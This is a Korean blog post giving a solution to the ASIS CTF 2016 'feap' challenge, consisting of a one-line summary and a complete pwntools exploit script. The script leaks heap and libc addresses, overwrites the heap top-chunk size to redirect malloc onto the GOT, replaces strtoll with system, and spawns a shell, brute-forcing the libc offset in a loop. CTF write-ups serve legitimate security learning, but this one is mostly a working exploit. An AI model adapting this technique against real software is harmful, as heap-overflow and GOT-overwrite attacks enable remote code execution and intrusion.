본문 바로가기

Games/CTF

ASIS CTF 2016 feap

힙쪽에 64바이트 오버플로우. topchunk 덮어서 malloc 조작한뒤 GOT 덮어서 쉘획득.


from pwn import *

context.arch = 'amd64' # i386 / arm


DELTA = 0x27be0

while True:

print hex(DELTA)

try:

# recvuntil sendline, pack, recv, send

r = remote('feap.asis-ctf.ir', 7331)

#r = process(['./feap'])

#raw_input('attach')

# start pwn.


# prepare first heap chunk

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('70')

print r.recvuntil('63): ')

r.sendline(pack(0x6020a8)) # heap address

print r.recvuntil('70): ')

r.sendline('nah')


print r.recvuntil('> ')

r.sendline('5')

print r.recvuntil('print: ')

r.sendline('44')

leak = r.recvuntil('\nBody:').split('Title: ')[1].split('\nBody:')[0]

heap_base = int(leak[::-1].encode('hex'), 16)

heap_base = heap_base & 0xFFFFF000

print 'heap base : {0}'.format(hex(heap_base))


# prepare first heap chunk

print r.recvuntil('> ')

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('0')

print r.recvuntil('body: ')

r.sendline('1')      # heap address

print r.recvuntil('title: ')

r.sendline(pack(0x602048))

print r.recvuntil('> ')

r.sendline('5')

print r.recvuntil('print: ')

r.sendline('44')

leak = r.recvuntil('\nBody:').split('Title: ')[1].split('\nBody:')[0]

fgets = int(leak[::-1].encode('hex'), 16)

print 'fgets : {0}'.format(hex(fgets))


# overwrite topchunk

print r.recvuntil('> ')

r.sendline('3')

print r.recvuntil('edit: ')

r.sendline('0')

print r.recvuntil('body: ')

r.sendline('2')

print r.recvuntil('body: ')

r.sendline('\x41'*72 + '\xFF'*8) # overwrite topchunk size to -1


# fuck malloc

TARGET = 0x602010

delta = TARGET - heap_base - 0x218

print str(delta)

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline(str(delta))

print r.recvuntil('63): ')

r.sendline('lol')


# overwrite free

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('70')

print r.recvuntil('63): ')


#system = fgets - 0x27be0 # local

system = fgets - DELTA

payload = 'AAAAAAAA' # libc_start

payload += pack(fgets) # fgets

payload += pack(system) # strtoll

r.sendline(payload)      # heap address

print r.recvuntil('70): ')

r.sendline('CCC')


# get shell

print r.recvuntil('> ')

r.sendline('1')

print r.recvuntil('size: ')

r.sendline('/bin/sh;')


# get shell

r.interactive()


except:

pass

DELTA += 0x10



'Games > CTF' 카테고리의 다른 글

BKP2016 segsh  (0) 2016.06.24
ASIS CTF 2016 books  (0) 2016.05.11
PlaidCTF 2016 butterfly  (0) 2016.04.19
PlaidCTF 2016 fixedpoint  (0) 2016.04.19
PlaidCTF 2016 pzip  (0) 2016.04.19